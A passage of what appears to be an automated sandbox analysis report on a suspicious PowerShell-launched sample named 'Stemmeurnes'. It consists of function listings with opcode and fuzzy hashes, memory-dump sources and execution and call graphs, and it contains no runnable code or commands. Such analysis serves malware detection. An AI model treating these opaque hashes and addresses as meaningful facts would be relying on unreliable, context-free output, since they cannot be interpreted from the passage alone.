                                                                        • Snapshot File: hcaresult_2_2_2ced000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9a48ad1430cb29888a7bb58b8ef758358b65aa50f6297972f5b52e4a59519a14
                                                                        • Instruction ID: e10527ab7c54ec7fa4c5f205904c752f71ef266c256650608f6769521252614c
                                                                        • Opcode Fuzzy Hash: 9a48ad1430cb29888a7bb58b8ef758358b65aa50f6297972f5b52e4a59519a14
                                                                        • Instruction Fuzzy Hash: 6A01526140E3C05FD7128B258994752BFB8DF43224F1DC1DBD9898F2A3C2695845C7B2
                                                                        Function 02CED01D Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449366686.0000000002CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2ced000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c2d7b9e8a5439229fe1c5f00c7dd7a1e1209b1664208277c9bdb0ddab292cf8a
                                                                        • Instruction ID: 3d329d5067e81fd467514af9c55cd53a3bb258ab56623ff82a1bc4ae42e1ddf3
                                                                        • Opcode Fuzzy Hash: c2d7b9e8a5439229fe1c5f00c7dd7a1e1209b1664208277c9bdb0ddab292cf8a
                                                                        • Instruction Fuzzy Hash: 3801F2714053409AEB204A26C980B66BF9CDF81324F1CC01AED0B0B282CBB99981C6F1
                                                                        Function 045AF510 Relevance: .0, Instructions: 42COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449646766.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_45a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 98810a59c5aa2f234056fedf2a08e955c1c388f0c98637d6f0242fa95c5f9236
                                                                        • Instruction ID: 05c3cd713e4a08bb49c0851ac702037967d7e9bb7433d02ede6441cd9b422c78
                                                                        • Opcode Fuzzy Hash: 98810a59c5aa2f234056fedf2a08e955c1c388f0c98637d6f0242fa95c5f9236
                                                                        • Instruction Fuzzy Hash: B801F4357042608F8B6A9B38B05847D7FABEFD9232316018EE883C7352CF789C028B55
                                                                        Function 045AF520 Relevance: .0, Instructions: 37COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449646766.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_45a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 07983ec052656dd584d16196677ac3c4e68d985e1803ea84c4f9e7529f60fc27
                                                                        • Instruction ID: be8d1f0c7f36b34e7f1aee9563ad607e8735a0d8f9540d398dd37abdabe9065a
                                                                        • Opcode Fuzzy Hash: 07983ec052656dd584d16196677ac3c4e68d985e1803ea84c4f9e7529f60fc27
                                                                        • Instruction Fuzzy Hash: 91F090353005248B8B696B28F01847E7BABEFD8632315459EE987C3355CF789C028791
                                                                        Function 08DF0438 Relevance: .0, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3459151390.0000000008DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_8df0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d143fa42d3fbf36a1b3dc6a9bead21e089259377ba3dea493a0bfb1fa4294dcb
                                                                        • Instruction ID: 2e2ee82a2bc8ae441c6847fb15d3e56568820bc508ed3b4ebb6f02124a67161f
                                                                        • Opcode Fuzzy Hash: d143fa42d3fbf36a1b3dc6a9bead21e089259377ba3dea493a0bfb1fa4294dcb
                                                                        • Instruction Fuzzy Hash: 75F02734E05249CFCB10E7AAE8449EEBFB5EF81350F0181AED0019B292DB781C06CF91
                                                                        Function 045AFDCA Relevance: .0, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449646766.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_45a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0b5834b2eaf450fe7b17ccf92948682113dec83dbbb1412af3cdd3600a1e3871
                                                                        • Instruction ID: b714fef110f3c3edfe05e4389a1558536ea71423b3658c268b60e920e63d6601
                                                                        • Opcode Fuzzy Hash: 0b5834b2eaf450fe7b17ccf92948682113dec83dbbb1412af3cdd3600a1e3871
                                                                        • Instruction Fuzzy Hash: 7AE09274C05249AF8384DF7C888159EFFF4AB19210B1089AEC908D7202E6318642CBD1
                                                                        Function 045AFDD8 Relevance: .0, Instructions: 16COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449646766.00000000045A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_45a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                        • Instruction ID: 835fc3cc1ca01cb025d86ebfbfa44264d30e3381e9e306a3f0080fd431d1ec2e
                                                                        • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                        • Instruction Fuzzy Hash: 91D06271D042099F8780DFADC94156DFBF4EB59200F5085AE8919D7301F73256129BD1

                                                                        Non-executed Functions

                                                                        Function 02CED6CC Relevance: .1, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.3449366686.0000000002CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_2ced000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ed49da08792f766bf00f20077b70fd3330f6dc864f65f2694de01dcb8e4d9498
                                                                        • Instruction ID: 6d426d7b476910b626e974fa32b649d1c8054b329ee74df0c518a3012978b164
                                                                        • Opcode Fuzzy Hash: ed49da08792f766bf00f20077b70fd3330f6dc864f65f2694de01dcb8e4d9498
                                                                        • Instruction Fuzzy Hash: DA2125B6504244DFDF04DF10D9C0B2ABF69FBC4324F248569D90B0B25AC376D456CBA2

                                                                        Execution Graph

                                                                        Execution Coverage:0.5%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:93.1%
                                                                        Total number of Nodes:145
                                                                        Total number of Limit Nodes:7
                                                                        execution_graph 1560 22aa2c0a 1561 22aa2c1f LdrInitializeThunk 1560->1561 1562 22aa2c11 1560->1562 1708 22a692c5 1709 22a692fd 1708->1709 1710 22ac26ac GetPEB 1709->1710 1711 22a69305 1709->1711 1710->1711 1712 22ac26c8 GetPEB 1711->1712 1713 22a69313 1711->1713 1712->1713 1714 22a69358 1713->1714 1716 22aa2b60 LdrInitializeThunk 1713->1716 1716->1714 1717 22a6a2c3 GetPEB 1718 22ac2b5e 1717->1718 1719 22a6a318 1717->1719 1718->1719 1720 22ac2b66 GetPEB 1718->1720 1721 22ac2b82 GetPEB 1719->1721 1723 22a6a328 1719->1723 1720->1719 1721->1723 1722 22ac2ba7 GetPEB 1724 22a6a3a1 1722->1724 1723->1722 1723->1724 1726 22a6a360 1723->1726 1725 22ac2bc4 GetPEB 1724->1725 1724->1726 1725->1726 1662 22a702e1 1663 22ac4c74 1662->1663 1666 22a70307 1662->1666 1664 22a70367 1663->1664 1665 22ac4c94 GetPEB 1663->1665 1667 22ac4ca7 GetPEB 1664->1667 1669 22a70375 1664->1669 1665->1664 1666->1663 1668 22a7034c GetPEB 1666->1668 1667->1669 1668->1663 1668->1664 1670 22b202f4 1671 22b20320 1670->1671 1674 22aa2b60 LdrInitializeThunk 1671->1674 1673 22b20326 1674->1673 1567 22a752a0 1568 22a7531e 1567->1568 1569 22a753e6 1568->1569 1574 22a7567f 1568->1574 1575 22a755e8 1568->1575 1570 22a75479 GetPEB 1569->1570 1577 22a7548d 1569->1577 1589 22aa2b60 LdrInitializeThunk 1569->1589 1570->1577 1572 22ac6d10 GetPEB 1573 22ac6d24 1572->1573 1573->1570 1574->1575 1582 22a9329e 1574->1582 1577->1575 1578 22a755d7 GetPEB 1577->1578 1590 22aa2b60 LdrInitializeThunk 1577->1590 1578->1575 1580 22ac6dca GetPEB 1581 22ac6ddb 1580->1581 1581->1578 1585 22a932d4 1582->1585 1583 22a9333f 1583->1574 1584 22a9332c GetPEB 1584->1583 1585->1583 1585->1584 1591 22aa2b60 LdrInitializeThunk 1585->1591 1587 22ad29e4 GetPEB 1588 22ad29f4 1587->1588 1588->1584 1589->1572 1590->1580 1591->1587 1592 22a702a0 GetPEB 1593 22a702ad 1592->1593 1594 22a702b3 1592->1594 1594->1593 1595 22ac4c67 GetPEB 1594->1595 1675 22b1f2f8 1676 22b1f32c 1675->1676 1677 22b1f330 GetPEB 1676->1677 1678 22b1f340 1676->1678 1677->1678 1563 22aa2b60 LdrInitializeThunk 1640 22ae0283 1641 22ae02aa 1640->1641 1642 22ae02be 1641->1642 1643 22ae02ae GetPEB 1641->1643 1644 22ae02cc GetPEB 1642->1644 1647 22ae02f4 1642->1647 1643->1642 1645 22ae02db 1644->1645 1644->1647 1646 22ae02e4 GetPEB 1645->1646 1645->1647 1646->1647 1648 22a9e284 1650 22a9e2b9 1648->1650 1649 22a9e2cd GetPEB 1653 22a9e2e1 1649->1653 1650->1649 1651 22a9e3f0 1650->1651 1652 22a9e3de GetPEB 1652->1651 1653->1651 1653->1652 1596 22af62a0 1597 22af62c0 GetPEB 1596->1597 1601 22af62b6 1596->1601 1599 22af62f0 1597->1599 1600 22af6330 GetPEB 1599->1600 1599->1601 1606 22af6342 1599->1606 1600->1601 1602 22af64c5 GetPEB 1602->1601 1603 22af64a4 1603->1602 1613 22aa2b60 LdrInitializeThunk 1603->1613 1604 22af6411 GetPEB 1604->1606 1606->1603 1606->1604 1608 22af6467 1606->1608 1611 22af6452 GetPEB 1606->1611 1607 22af649d 1612 22aa2b60 LdrInitializeThunk 1607->1612 1608->1601 1608->1607 1609 22af648c GetPEB 1608->1609 1609->1607 1611->1606 1612->1603 1613->1602 1614 22af72a0 1619 22af72b8 1614->1619 1615 22af72e8 1616 22af7302 1615->1616 1617 22af72f0 GetPEB 1615->1617 1624 22aa2b60 LdrInitializeThunk 1616->1624 1617->1616 1619->1615 1623 22aa2b60 LdrInitializeThunk 1619->1623 1620 22af7309 GetPEB 1622 22af7319 1620->1622 1623->1615 1624->1620 1625 22ae92bc 1626 22ae92e7 1625->1626 1627 22ae92c5 GetPEB GetPEB 1625->1627 1628 22ae9308 1626->1628 1629 22ae92ee GetPEB GetPEB 1626->1629 1627->1628 1629->1628 1630 22b292a6 1631 22b292d6 1630->1631 1632 22b29414 GetPEB 1631->1632 1633 22b29424 1631->1633 1632->1633 1634 22b29457 1633->1634 1635 22b2944a GetPEB 1633->1635 1636 22b29481 1634->1636 1637 22b2945e GetPEB 1634->1637 1635->1634 1637->1636 1638 22b2946d 1637->1638 1638->1636 1639 22b29476 GetPEB 1638->1639 1639->1636 1658 22a9d290 1661 22a9d2a3 1658->1661 1659 22a9d2bb ___swprintf_l 1660 22a9d310 1659->1660 1661->1659 1661->1660 1683 22a592ff 1684 22a59314 RtlDebugPrintTimes 1683->1684 1685 22a5932d 1683->1685 1684->1685 1686 22a5934f 1685->1686 1687 22a5933b GetPEB 1685->1687 1687->1686 1688 22b112ed 1702 22b1169e 1688->1702 1706 22b11313 1688->1706 1689 22b118b4 1692 22b118bd GetPEB 1689->1692 1696 22b116d7 1689->1696 1690 22b116ad GetPEB 1693 22b116bd GetPEB 1690->1693 1690->1696 1691 22b11824 GetPEB 1694 22b11830 GetPEB 1691->1694 1691->1696 1695 22b118c9 GetPEB 1692->1695 1692->1696 1693->1696 1694->1696 1695->1696 1697 22b117e0 GetPEB 1697->1696 1699 22b117ec GetPEB 1697->1699 1698 22b116dd GetPEB 1698->1696 1701 22b116e9 GetPEB 1698->1701 1699->1696 1700 22b11774 1700->1696 1703 22b1177f GetPEB 1700->1703 1701->1696 1702->1689 1702->1690 1703->1696 1704 22b1178b GetPEB 1703->1704 1704->1696 1705 22b1172d GetPEB 1705->1696 1707 22b11739 GetPEB 1705->1707 1706->1691 1706->1696 1706->1697 1706->1698 1706->1700 1706->1702 1706->1705 1707->1696

                                                                        Callgraph

                                                                        • Executed
                                                                        • Not Executed
                                                                        • Opacity -> Relevance
                                                                        • Disassembly available
                                                                        callgraph 0 Function_22A682A2 1 Function_22A662A3 2 Function_22A752A0 34 Function_22A9329E 2->34 47 Function_22AA2B60 2->47 3 Function_22A702A0 4 Function_22A942A0 65 Function_22A942CF 4->65 5 Function_22A9C2A0 6 Function_22AA62A0 7 Function_22AB72A0 8 Function_22B1E2BD 9 Function_22AAD2A4 10 Function_22AF62A0 10->47 11 Function_22AF72A0 11->47 12 Function_22A672A9 13 Function_22B172A1 14 Function_22B1E2A0 15 Function_22A9B2BB 16 Function_22AE92BC 17 Function_22A8F2BB 18 Function_22B292A6 19 Function_22A922BC 20 Function_22A842B0 21 Function_22A9C2B3 22 Function_22A962B5 23 Function_22B212AD 24 Function_22AA2C0A 25 Function_22A8B280 26 Function_22AB6282 27 Function_22AE0283 28 Function_22A9E284 29 Function_22A82286 30 Function_22B14281 31 Function_22B35283 32 Function_22A9229A 33 Function_22A59296 34->47 35 Function_22A9D290 36 Function_22AEF290 37 Function_22A5A2E0 38 Function_22AB12EE 39 Function_22A702E1 40 Function_22AB62ED 46 Function_22A952E0 40->46 41 Function_22A862EE 42 Function_22B202F4 42->47 43 Function_22AE12E9 44 Function_22B142F9 44->30 45 Function_22B1F2F8 48 Function_22AB72E0 49 Function_22AAD2E5 50 Function_22B352E2 51 Function_22A562F0 52 Function_22AA2C70 53 Function_22AA2DF0 54 Function_22A592FF 55 Function_22B1C2EB 56 Function_22B112ED 57 Function_22AEF2F0 58 Function_22A692C5 58->47 59 Function_22B0F2D4 60 Function_22B172D5 61 Function_22A582C0 62 Function_22AFD2CA 63 Function_22A6A2C3 64 Function_22A5B2C0 66 Function_22AA35C0

                                                                        Executed Functions

                                                                        Function 22AA2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 4 22aa2b60-22aa2b6c LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: f01323658abd3f7fde1c91daa0eb53c573d2397c31c581913f3e24022bb3bc33
                                                                        • Instruction ID: ed2f833f5f93a3f1d93bc10e46655ccd8b82cd06eea2aaae948bb5f067f712a6
                                                                        • Opcode Fuzzy Hash: f01323658abd3f7fde1c91daa0eb53c573d2397c31c581913f3e24022bb3bc33
                                                                        • Instruction Fuzzy Hash: 27900261202500074105715C4854616401E4BF1201B96C025E1015590DC5258991A525
                                                                        Function 22AA2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 5 22aa2c70-22aa2c7c LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 660e149472ddda0d20b8d3013aa73605602993af6ad415a25bd6fb1364d348c0
                                                                        • Instruction ID: 76e7c3ed6334b6119fbc11097a8b42d0bab12f54137b9c3c4dae849d4d54643c
                                                                        • Opcode Fuzzy Hash: 660e149472ddda0d20b8d3013aa73605602993af6ad415a25bd6fb1364d348c0
                                                                        • Instruction Fuzzy Hash: 9290023120158806D110715C884474A00194BE1301F9AC415A4425658D86958991B521
                                                                        Function 22AA2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 6 22aa2df0-22aa2dfc LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 76242981e6306517ccc81e620f315c9bc3db794e68458d429562963297dcb6dc
                                                                        • Instruction ID: 60816d8c1145337220bcadb8fcec9a17b3fcd39ffa6c70225a68c264800a1a09
                                                                        • Opcode Fuzzy Hash: 76242981e6306517ccc81e620f315c9bc3db794e68458d429562963297dcb6dc
                                                                        • Instruction Fuzzy Hash: 3590023120150417D111715C4944707001D4BE1241FD6C416A0425558D96568A52E521
                                                                        Function 22AA35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 7 22aa35c0-22aa35cc LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: ed976feba7681815e5b8b480c82a85f046af48e9094f993228b45d949191a1a1
                                                                        • Instruction ID: 0909491b7659d9319548ed17977b9fde2859b9bb2dccd86c22a79810d6ef31da
                                                                        • Opcode Fuzzy Hash: ed976feba7681815e5b8b480c82a85f046af48e9094f993228b45d949191a1a1
                                                                        • Instruction Fuzzy Hash: 6C90023160560406D100715C495470610194BE1201FA6C415A0425568D87958A51A9A2
                                                                        Function 22AA2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 22aa2c0a-22aa2c0f 1 22aa2c1f-22aa2c26 LdrInitializeThunk 0->1 2 22aa2c11-22aa2c18 0->2
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 8ae4a3b660cfaaa85b9489af6be99466c879d71f392cb19626b1b5db8ff868cc
                                                                        • Instruction ID: 20876967b7bf9205c8f3e9339b151b8cf7a9cb4d0b75e2c2f240af120f0dbe95
                                                                        • Opcode Fuzzy Hash: 8ae4a3b660cfaaa85b9489af6be99466c879d71f392cb19626b1b5db8ff868cc
                                                                        • Instruction Fuzzy Hash: 03B09B719016C5C9D601E7644F4870779147FD1701F66C075D2030781F4778C5D1E575

                                                                        Non-executed Functions

                                                                        Function 22B112ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                        • API String ID: 0-3591852110
                                                                        • Opcode ID: 8e898e8254076591eeee62e04d0a7dc987e2aba90f70fefa7e7d3bad5f21cbca
                                                                        • Instruction ID: 807f1d488049f9697c4379054f9aa46c9baf2a37449e5e93069ebda6f8b1ceae
                                                                        • Opcode Fuzzy Hash: 8e898e8254076591eeee62e04d0a7dc987e2aba90f70fefa7e7d3bad5f21cbca
                                                                        • Instruction Fuzzy Hash: 6012E070620782EFD716CF68C581BBABBF1FF09714F148559E4868BA66D734E980CB50
                                                                        Function 22A752A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$@
                                                                        • API String ID: 0-149943524
                                                                        • Opcode ID: 644b1b8545185927948352e8f07e6739902d967bfc289065cd1f2f76ff429e60
                                                                        • Instruction ID: 3d25d4e30cfe7d788a0abe3a8c318ad30de57c5fb17f9d2898c17a2972e18190
                                                                        • Opcode Fuzzy Hash: 644b1b8545185927948352e8f07e6739902d967bfc289065cd1f2f76ff429e60
                                                                        • Instruction Fuzzy Hash: B5329C706083518BC724CF19C690B6EB7F1FF88B44F14492EFA859BAA0E734D944CB96
                                                                        Function 22A6A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 627 22a6a2c3-22a6a312 GetPEB 628 22ac2b5e-22ac2b60 627->628 629 22a6a318 627->629 628->629 631 22ac2b66-22ac2b74 GetPEB 628->631 630 22a6a31a-22a6a322 629->630 632 22ac2b79-22ac2b80 call 22a73d20 630->632 633 22a6a328-22a6a32a 630->633 631->630 640 22ac2b92 632->640 641 22ac2b82-22ac2b90 GetPEB 632->641 634 22a6a330-22a6a335 633->634 635 22ac2be3 633->635 634->635 637 22a6a33b-22a6a340 634->637 637->635 639 22a6a346-22a6a35e call 22a6b6c0 637->639 646 22a6a367-22a6a36c 639->646 647 22a6a360-22a6a364 639->647 643 22ac2b94-22ac2b9f call 22aeff81 640->643 641->643 651 22ac2ba7-22ac2bb0 GetPEB 643->651 649 22a6a3ae-22a6a3b3 646->649 650 22a6a36e-22a6a371 646->650 652 22a6a394-22a6a39b call 22a73d20 649->652 650->649 653 22a6a373-22a6a376 650->653 657 22ac2bbb-22ac2bc2 call 22a73d20 651->657 652->651 659 22a6a3a1-22a6a3a4 652->659 653->649 655 22a6a378-22a6a37e 653->655 655->649 658 22a6a380-22a6a385 655->658 664 22ac2bc4-22ac2bcd GetPEB 657->664 665 22ac2bd3-22ac2bde call 22aeff81 657->665 658->649 661 22a6a387-22a6a392 658->661 659->657 662 22a6a3aa-22a6a3ac 659->662 661->652 662->647 664->665 665->635
                                                                        Strings
                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 22A6A309
                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 22A6A2FB
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                        • API String ID: 0-2876891731
                                                                        • Opcode ID: 9e2965b949a66f9874ba74051b40c5d16053778762ca04f6604af3e89f54919f
                                                                        • Instruction ID: 114208e42a1760fd2cb376631926eade639b46ab6be2988ca7633f0e240613d5
                                                                        • Opcode Fuzzy Hash: 9e2965b949a66f9874ba74051b40c5d16053778762ca04f6604af3e89f54919f
                                                                        • Instruction Fuzzy Hash: 6541DE34A44745CBDB01CF69CA80B7E77B4FF85704F1481A5EA15DBA92E379CA80CB51
                                                                        Function 22A9329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
